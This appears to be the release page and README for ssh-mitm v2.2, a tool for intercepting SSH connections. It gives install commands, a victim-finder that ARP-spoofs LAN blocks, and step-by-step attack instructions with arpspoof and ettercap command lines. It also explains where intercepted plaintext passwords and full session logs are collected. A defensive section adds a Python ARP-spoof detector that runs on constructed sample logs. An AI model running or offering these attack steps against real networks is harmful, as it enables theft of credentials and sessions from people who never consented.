ssh-mitm v2.2 releases: SSH man-in-the-middle tool
SSH MITM
This penetration testing tool allows an auditor to intercept SSH connections. A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and a legitimate SSH server; all plaintext passwords and sessions are logged to disk.
Of course, the victim’s SSH client will complain that the server’s key has changed. Because 99.99999% of the time this is caused by a legitimate action (OS re-install, configuration change, etc.), many, if not most, users will disregard the warning and continue on.
NOTE: Only run the modified sshd_mitm in a VM or container! Ad-hoc edits were made to the OpenSSH sources in critical regions, with no regard to their security implications. It is not hard to imagine that these edits introduce serious vulnerabilities.
Changelog v2.2
- Fixed installation for Kali and Linux Mint 19.
- Fixed a double-password prompt that occurred under certain conditions.
- Improved error logging.
Install
git clone https://github.com/jtesta/ssh-mitm.git
cd ssh-mitm
bash install.sh
Usage
Finding Targets
The JoesAwesomeSSHMITMVictimFinder.py script makes finding targets on a LAN very easy. It will ARP spoof a block of IPs and sniff for SSH traffic for a short period of time before moving on to the next block. Any ongoing SSH connections originating from devices on the LAN are reported.
By default, JoesAwesomeSSHMITMVictimFinder.py will ARP spoof and sniff only 5 IPs at a time for 20 seconds before moving on to the next block of 5. These parameters can be tuned, though a trade-off exists: the more IPs that are spoofed at a time, the greater the chance you will catch an ongoing SSH connection, but also the greater the strain you will put on your puny network interface. Under too high a load, your interface will start dropping frames, causing a denial of service and greatly raising suspicions (this is bad). The defaults shouldn’t cause problems in most cases, though it will take longer to find targets. The block size can be safely raised on low-utilization networks.
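The block-by-block ARP spoofing described above leaves a footprint a defender can watch for on the LAN: a gateway or host IP suddenly being announced by a second MAC, and a single MAC answering for several IPs at once. The following detector is an added example written for this page, not part of ssh-mitm; it parses constructed tcpdump-style ARP reply lines and flags both patterns.

```python
import re
from collections import defaultdict

# Constructed sample of tcpdump-style ARP output (not captured from a real network).
# Lines 1-3 are the legitimate gateway and two hosts; lines 4-6 show one MAC
# re-announcing all three IPs, the pattern a bidirectional ARP spoof produces.
SAMPLE_ARP_LOG = """\
10:00:01.000001 ARP, Reply 192.168.1.1 is-at 00:11:22:aa:bb:01, length 28
10:00:01.500002 ARP, Reply 192.168.1.5 is-at 00:11:22:aa:bb:05, length 28
10:00:02.000003 ARP, Reply 192.168.1.6 is-at 00:11:22:aa:bb:06, length 28
10:00:03.000004 ARP, Reply 192.168.1.1 is-at 00:11:22:aa:bb:99, length 28
10:00:03.000005 ARP, Reply 192.168.1.5 is-at 00:11:22:aa:bb:99, length 28
10:00:03.000006 ARP, Reply 192.168.1.6 is-at 00:11:22:aa:bb:99, length 28
10:00:04.000007 ARP, Request who-has 192.168.1.7 tell 192.168.1.1, length 28
"""

ARP_REPLY = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_replies(log):
    """Yield (ip, mac) pairs from ARP Reply lines; requests are ignored."""
    for line in log.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_spoofing(log, max_ips_per_mac=1):
    """Return two alert tables: IPs answered by more than one MAC, and MACs
    answering for more than max_ips_per_mac IPs. Raise max_ips_per_mac on
    segments where a router or proxy-ARP host legitimately owns several IPs."""
    macs_by_ip = defaultdict(set)
    ips_by_mac = defaultdict(set)
    for ip, mac in parse_replies(log):
        macs_by_ip[ip].add(mac)
        ips_by_mac[mac].add(ip)
    return {
        "ip_with_multiple_macs": {ip: sorted(m) for ip, m in macs_by_ip.items() if len(m) > 1},
        "mac_claiming_multiple_ips": {mac: sorted(i) for mac, i in ips_by_mac.items()
                                      if len(i) > max_ips_per_mac},
    }


if __name__ == "__main__":
    for kind, hits in detect_arp_spoofing(SAMPLE_ARP_LOG).items():
        for key, values in hits.items():
            print(f"{kind}: {key} -> {', '.join(values)}")
```

On a live segment, feed it the output of `tcpdump -l -n arp` or a switch's ARP inspection log; an alert on the gateway IP is the one that matters most, since that is what redirects the SSH traffic.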
Running The Attack
1.) Once you’ve completed the initial setup and found a list of potential victims (see above), execute start.sh as root. This will start sshd_mitm, enable IP forwarding, and set up SSH packet interception through iptables.
2.) ARP spoof the target(s) (Protip: do NOT spoof all the things! Your puny network interface won’t likely be able to handle an entire network’s traffic all at once. Only spoof a couple of IPs at a time):
arpspoof -r -t 192.168.x.1 192.168.x.5
Alternatively, you can use the ettercap tool:
ettercap -i enp0s3 -T -M arp /192.168.x.1// /192.168.x.5,192.168.x.6//
3.) Monitor auth.log. Intercepted passwords will appear here:
sudo tail -f /var/log/auth.log
4.) Once a session is established, a full log of all input & output can be found in /home/ssh-mitm/. SSH sessions are logged as shell_session_*.txt, and SFTP sessions are logged as sftp_session_*.html (with transferred files stored in a corresponding directory).
Copyright 2017-2018 Joseph S. Testa II
Source: https://github.com/jtesta/